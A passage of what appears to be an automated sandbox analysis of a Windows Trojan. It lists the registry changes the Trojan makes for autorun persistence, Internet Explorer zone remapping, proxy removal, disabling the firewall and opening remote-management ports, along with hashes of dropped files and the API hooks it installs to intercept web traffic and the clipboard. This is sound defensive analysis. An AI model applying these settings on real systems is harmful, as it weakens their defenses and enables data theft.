[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"

[HKCU\Software\e307dfcb0a]
"f4ea4294" = "865"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\e307dfcb0a]
"5119f545" = "LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"0494a3ce" = "1442757180"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 F0 14 C2 8F EA B5 14 E4 A6 53 3C BD 8F 71 BD"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\e307dfcb0a]
"5232108f" = "ÈwûFª2°p~,¤eÅ’@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK<ÃŽ«8GÝt9mFù„zËœ-ßô‚]ꨧÖ×mà`fhêç‡/«hÜ°remIèÑyDÈ6 ˆŸG”ô?1ËœußXV@@¿°2iVT©Ðãà¯ÉÛ)ŠÕ9NÅ“J:4Ã’Å m¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&”š®Ø©(;°REø¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGÝ¡=ž=B±‡uÕµyáC91wo{¢Aû8oò¨Æ’@‹^×Ádð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûŠ¦YÙ]½oes¶‹´"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"

[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\e307dfcb0a]
"52b1e748" = "6C198210E7D1FFE5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1442757180"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe."

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\fadehi\fadehi.exe "

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

The process regsvr32.exe:3404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 D2 64 B9 07 33 33 10 81 22 6C 05 95 05 A8 AE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E" = "D43673142A7803D5E"

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2" = "DEF5A832C6F4203B2"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
[HKLM\SOFTWARE\BC91AD57E73BCB11448]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\370B7A67EEBD84F6926B]
"DEF5A832C6F4203B2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\BC91AD57E73BCB11448]
"D43673142A7803D5E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

The process regsvr32.exe:3200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 9B 33 0E AA E1 AE 01 AB AA 92 34 F2 AD DA 66"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process wsmanhttpconfig.exe:3232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 74 09 EA 1C 03 27 B8 EF A7 47 AA A5 7F 1C 7E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process wsmanhttpconfig.exe:1960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 70 27 85 1A FF 0E 1F 70 1A 1D 36 51 E7 59 47"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "D43F50A7-7CCC-43E7-9E47-8D49C8B4D82A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The process netsh.exe:2304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"BitNames" = " NAP_TRACE_BASE NAP_TRACE_NETSH"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 2B BC DB F3 4F AE E6 9B E1 BF C4 D2 AC D2 EC"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

A firewall is disabled:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = "0"

The process bindata865.exe:3088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 0A 06 0C F8 80 1C B1 1C 78 63 AA 64 40 B3 92"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE]
"(Default)"

Dropped PE files

MD5 File path
40bafdbf7f27041cef77b05441f9b0c4 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Olifiqtu\yfenaromaf.exe
6f2813669b17c1d1a74507d352b126d8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\fadehi\fadehi.exe
9859a26d5e72bbb0685af813b409d99d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
d510b5b91adbf3479ef0adc04f00e34c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmp4d895b52\new.exe
85d7ab466d0577c49fc9879107ec7ef5 c:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll
2f7fe3a781ba8c0a67c775f20e3e9f70 c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll
173d3dd1425a8e33fa1d4ed71067a3a2 c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll
75c183e262bd4400eb0f20349f6ef383 c:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll
08e87e8abf7b41b28663dce817ce0ab6 c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll
4e2482e69baaf3a5b13db8101c063ebf c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll
f3ac3f844f90380aab2b4c0836c4288f c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll
b87e087fc013225e2aa1cb60c080647d c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll
dfeb401cc051e5da721c584ff6a90f88 c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll
1ce73fb3f88c716cfc3fd550547d2b35 c:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll
3991b7fa452a9c9c291c06365a236792 c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll
36ff641f37918f2cca98e7f407ac4d75 c:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll
208fa9d0ebe2ceb9616042772e96598e c:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll
37bed865557084dd9988350ab1675e0b c:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll
d4eefccdc3de6ced901535fa4153c491 c:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll
108500a98b9a2f66823e7615398fc87b c:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll
3eab4dbdc290edc4d53fe77f1fdb9e59 c:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll
5a69fb5d686f863e0e13268d671ef16d c:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll
53a9d748ef09920a0d06da2583c298ad c:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll
c7a0d1321a67a2afd330c5fbe79befd1 c:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll
1a4e900c2fe3cd31d10107670d184fe6 c:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll
6372ea7d2aced7185183cf3fcdd3577b c:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll
f7da27672d2e4c21a1f996ee31de0dbf c:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll
df4217ddb34a0b73dc7aac7829371c0c c:\ea4acb66495575d6b9f323\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8 c:\ea4acb66495575d6b9f323\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9f c:\ea4acb66495575d6b9f323\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3 c:\ea4acb66495575d6b9f323\powershell_ise.resources.dll
fc9a05096522bb6d7ceda62ea1707420 c:\ea4acb66495575d6b9f323\pscustomsetuputil.exe
95b7f12a557dedac5e4a1e9afa5e73ab c:\ea4acb66495575d6b9f323\pspluginwkr.dll
35efd8cd6549a4339cb2a28c8cfd6598 c:\ea4acb66495575d6b9f323\pssetupnativeutils.exe
a94243b797377ba03b63fc716c13bcf5 c:\ea4acb66495575d6b9f323\pwrshmsg.dll
8c386819bf5b39d7a4b274d0b55f87a5 c:\ea4acb66495575d6b9f323\pwrshplugin.dll
7943a80f1a6fd37969aacd411b511f91 c:\ea4acb66495575d6b9f323\pwrshsip.dll
066f7fcca265d01a5b7eaf41ade789b1 c:\ea4acb66495575d6b9f323\spmsg.dll
a39df582ca051afc8811fbd00db12f10 c:\ea4acb66495575d6b9f323\spuninst.exe
1b2c60a6d6c3833b413943862b2bfed8 c:\ea4acb66495575d6b9f323\spupdsvc.exe
4d8ab4fad244f7985d8c59d456e026d7 c:\ea4acb66495575d6b9f323\system.management.automation.dll
2286b57ecc2d32d24049c51989084268 c:\ea4acb66495575d6b9f323\system.management.automation.resources.dll
5d6d17b645fa91fce7f0712f3da4f297 c:\ea4acb66495575d6b9f323\update\spcustom.dll
50914702cb6c72275018643c557ef8c5 c:\ea4acb66495575d6b9f323\update\update.exe
9a055da2f2819f155c33d47cd67a7c00 c:\ea4acb66495575d6b9f323\update\updspapi.dll
84e025b1259c66315f4d45a6caecacc9 c:\ea4acb66495575d6b9f323\wevtfwd.dll
cd17705af8e53a82facb545a213ab09c c:\ea4acb66495575d6b9f323\winrmprov.dll
afdf7654880ce23005014895b129d948 c:\ea4acb66495575d6b9f323\winrs.exe
3e9b11880ae4a8ff399ce0573c82655b c:\ea4acb66495575d6b9f323\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991 c:\ea4acb66495575d6b9f323\winrshost.exe
b84092e52861a026fc83bcede4a7abfa c:\ea4acb66495575d6b9f323\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1 c:\ea4acb66495575d6b9f323\winrssrv.dll
972916faac89c4aa978952b30f478e81 c:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe
2c9c9ae86eb2b4e78c8e09deb7509a63 c:\ea4acb66495575d6b9f323\wsmauto.dll
23ce21efc2ae95700f2b1f9582fe3867 c:\ea4acb66495575d6b9f323\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2 c:\ea4acb66495575d6b9f323\wsmprovhost.exe
67146d3606be1111a39f0fd61f47e9b6 c:\ea4acb66495575d6b9f323\wsmres.dll
18f347402da544a780949b8fdf83351b c:\ea4acb66495575d6b9f323\wsmsvc.dll
296e6992278fea7140d88b603e6c2a8a c:\ea4acb66495575d6b9f323\wsmwmipl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in WININET.dll:

HttpEndRequestW
HttpEndRequestA
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetSetFilePointer
InternetQueryDataAvailable
HttpOpenRequestW
HttpSendRequestExW
InternetReadFile
HttpQueryInfoA
HttpSendRequestA
InternetCloseHandle
HttpOpenRequestA

The Trojan installs the following user-mode hooks in CRYPT32.dll:

PFXImportCertStore

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
PeekMessageW
GetMessageW

The Trojan installs the following user-mode hooks in ADVAPI32.dll:

CreateProcessAsUserA
CreateProcessAsUserW
RegQueryValueExA
RegQueryValueExW

The Trojan installs the following user-mode hooks in WS2_32.dll:

WSASend
gethostbyname
send
closesocket
getaddrinfo

